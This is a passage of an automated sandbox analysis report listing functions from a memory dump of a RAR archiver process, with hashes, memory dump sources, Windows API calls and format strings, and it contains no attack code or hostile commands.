                                                            • Instruction ID: 58499bc3d984ee7d0227a2e5cc4105cf2c10bbb284de6cf9a785e36c01d41aea
                                                            • Opcode Fuzzy Hash: c3432b9c8060d01ce72343edc576a4dccd09043a68da9ff68992643fd273dc9a
                                                            • Instruction Fuzzy Hash: 80E1E621A0CE8281FF20AA2494542FAE751EF41BA8F940535DD6D8B7D6FE2CA449CF30
                                                            Function 00007FF71D2B72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88ca505e5f63b4630595d2a5785bb34e5d1a854cc4efaa54bf81e7772238fa42
                                                            • Instruction ID: 6ef4a0fd241b06ff6af43b313335c0171d05775806a043d7fda7faeff622152c
                                                            • Opcode Fuzzy Hash: 88ca505e5f63b4630595d2a5785bb34e5d1a854cc4efaa54bf81e7772238fa42
                                                            • Instruction Fuzzy Hash: 4E514773528BD194E700AF24A8441ED77A8FB44F98F5C423ADA880B79AEF389155C731
                                                            Function 00007FF71D31231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                            • Instruction ID: 298c4801b5fa0a3770d7d9f12883f0897256884471e754b12e28ad3b8a2f2cb2
                                                            • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                            • Instruction Fuzzy Hash: DB41D171E0DE13C2FB68BB10A491279E661AF90B60F80443DD90D0B691FE3CE84CCB60
                                                            Function 00007FF71D2C4D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CommandLine
                                                            • String ID:
                                                            • API String ID: 3253501508-0
                                                            • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                            • Instruction ID: f85eaefe0d83da283df4f9fd6e97c5cc8dfa44e9a1a84edecda07dec543063bb
                                                            • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                            • Instruction Fuzzy Hash: 7101881161CD4285EA15B756A4001BFD760AF45BA4FC80435EE5D07359FE3EE84A8B20
                                                            Function 00007FF71D2FA924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID:
                                                            • API String ID: 1825529933-0
                                                            • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                            • Instruction ID: 60b99ba75bc06e66be20e4596541c240c1d2ab8007a082067f6540044e248bc6
                                                            • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                            • Instruction Fuzzy Hash: 0001677170CA9285EE107F16A40506AE651BB59FD0F984834EF8D4BB5AEE3DD0464B14
                                                            Function 00007FF71D314B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                            • Instruction ID: a20010d629400f028473c7956ae65a86067801d9ec96f0056ee73e661d6bc9dc
                                                            • Opcode Fuzzy Hash: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                            • Instruction Fuzzy Hash: 44012C74A0CE43C0F968B6A69A4027AD3915F84BF4FD8C238ED5D462D6FD6CA40D4A30
                                                            Function 00007FF71D2D4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                            • Instruction ID: aa21dc81eecc23164f58e126a64fdcf1af3368bcd011913400f74876e6935c5d
                                                            • Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                            • Instruction Fuzzy Hash: E2F0863290CAC146DA11AB7191152F8A7509B16BB5F484335DEBC0B2D7DE5CD08D8F30
                                                            Function 00007FF71D314AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                            • Instruction ID: b212977cbe4fac0f8f82bef3a69da04df68ae1f7e6a686866be63d6536195b4b
                                                            • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                            • Instruction Fuzzy Hash: 44F05E31E0DA43C0FA947AA25850279D3944F447B0FC9463CED2E463C1FE5CE44C8934
                                                            Function 00007FF71D2D1930 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                            • Instruction ID: e18ccaf49ecca36cbb698190efa1662a95a16b937b69c70bb0528d81c40be418
                                                            • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                            • Instruction Fuzzy Hash: E8F0A433A0CE8685FB65AF64E4503B5A650DB00B78FA85334D63D054D9EF68D89ACB60
                                                            Function 00007FF71D2E38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                            • Instruction ID: 5ea481b4296c95d6a5b47cf02d9859f53966a4f8e10e406570b06e3156cef129
                                                            • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                            • Instruction Fuzzy Hash: D5E04F60F1DB0680ED5876A218610B983401F5EBA3ED45438CC3E26382FD1DE45D5E20
                                                            Function 00007FF71D31FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                            • Instruction ID: a5c2db7213306d8fef6b0ee04fb863264fa893708608ee5eba4d5fee99762a49
                                                            • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                            • Instruction Fuzzy Hash: D9D01776E1ED06C2F705AB40A845330E6716F583B9FC9073CC40D04550EFAC206C8A20
                                                            Function 00007FF71D2D4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D4549
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                            • Instruction ID: d99d2a82c6a1829564e5a71374fc301fa8c4a71200823344da53e180484d4845
                                                            • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                            • Instruction Fuzzy Hash: B1C02B36E09C81C0D504732D88550749210BF44B35FD00330C13D051E0EF1840EF0B10

                                                            Non-executed Functions

                                                            Function 00007FF71D2D67E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF71D2F49F4: LoadStringW.USER32 ref: 00007FF71D2F4A7B
                                                              • Part of subcall function 00007FF71D2F49F4: LoadStringW.USER32 ref: 00007FF71D2F4A94
                                                              • Part of subcall function 00007FF71D2FB6D0: Sleep.KERNEL32(?,?,?,?,00007FF71D2CCBED,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2FB730
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2D6CB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: LoadString$Sleepfflushswprintf
                                                            • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                            • API String ID: 668332963-4283793440
                                                            • Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                            • Instruction ID: 4d7f8a1fab6fe606155c94b5148df2606649452cf41f22f33cd71f48d78db8d7
                                                            • Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                            • Instruction Fuzzy Hash: 1C226222A0CEC695EB30FB24D8501FAE761EB55364FC44036D69D0769AFE6CE54DCB20
                                                            Function 00007FF71D2CD2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32 ref: 00007FF71D2CD4A6
                                                            • CloseHandle.KERNEL32 ref: 00007FF71D2CD4B9
                                                              • Part of subcall function 00007FF71D2CEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF73
                                                              • Part of subcall function 00007FF71D2CEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF84
                                                              • Part of subcall function 00007FF71D2CEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF71D2CEFA7
                                                              • Part of subcall function 00007FF71D2CEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF71D2CEFCA
                                                              • Part of subcall function 00007FF71D2CEF50: GetLastError.KERNEL32 ref: 00007FF71D2CEFD4
                                                              • Part of subcall function 00007FF71D2CEF50: CloseHandle.KERNEL32 ref: 00007FF71D2CEFE7
                                                            • CreateDirectoryW.KERNEL32 ref: 00007FF71D2CD4C6
                                                            • CreateFileW.KERNEL32 ref: 00007FF71D2CD64A
                                                            • DeviceIoControl.KERNEL32 ref: 00007FF71D2CD68B
                                                            • CloseHandle.KERNEL32 ref: 00007FF71D2CD69A
                                                            • GetLastError.KERNEL32 ref: 00007FF71D2CD6AD
                                                            • RemoveDirectoryW.KERNEL32 ref: 00007FF71D2CD6FA
                                                            • DeleteFileW.KERNEL32 ref: 00007FF71D2CD705
                                                              • Part of subcall function 00007FF71D2D2310: FlushFileBuffers.KERNEL32 ref: 00007FF71D2D233E
                                                              • Part of subcall function 00007FF71D2D2310: SetFileTime.KERNEL32 ref: 00007FF71D2D23DB
                                                              • Part of subcall function 00007FF71D2D1930: FindCloseChangeNotification.KERNELBASE ref: 00007FF71D2D1958
                                                              • Part of subcall function 00007FF71D2D39E0: SetFileAttributesW.KERNEL32(?,00007FF71D2D34EE,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D3A0F
